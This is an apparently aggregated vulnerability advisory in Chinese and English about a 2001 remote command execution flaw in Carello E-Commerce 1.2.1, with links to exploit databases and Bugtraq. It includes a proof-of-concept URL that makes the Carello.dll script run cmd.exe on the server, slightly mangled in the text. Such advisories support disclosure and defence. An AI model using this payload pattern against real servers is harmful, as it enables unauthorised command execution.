https://www.exploit-db.com/exploits/20850
https://www.securityfocus.com/bid/88780
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-130

CarelloE-Commerce1.2.1及其早期版本存在漏洞。远程攻击者可以借助特定结构URL提升额外特权并执行任意命令。

source: http://www.securityfocus.com/bid/2729/info

It is possible for a remote user to execute arbitrary commands on a host using Carello Shopping Cart software. A specially crafted HTTP request could cause inetinfo.exe to consume all available system resources, refusing any new connections. If arbitrary code is part of the HTTP request, it will be executed with the privileges of the web server.

http://foo.org/scripts/Carello/Carello.dllCARELLOCODE=SITE2&VBEXE=C:..winntsystem32cmd.exe20/c20echo20test>c:defcom.txt

Carello E-Commerce 1.2.1

来源:XF
名称:carello-url-code-execution(6532)
链接:http://xforce.iss.net/static/6532.php
来源:BUGTRAQ
名称:20010514def-2001-25:CarelloE-CommerceArbitraryCommandExecution
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=98991352402073&w;=2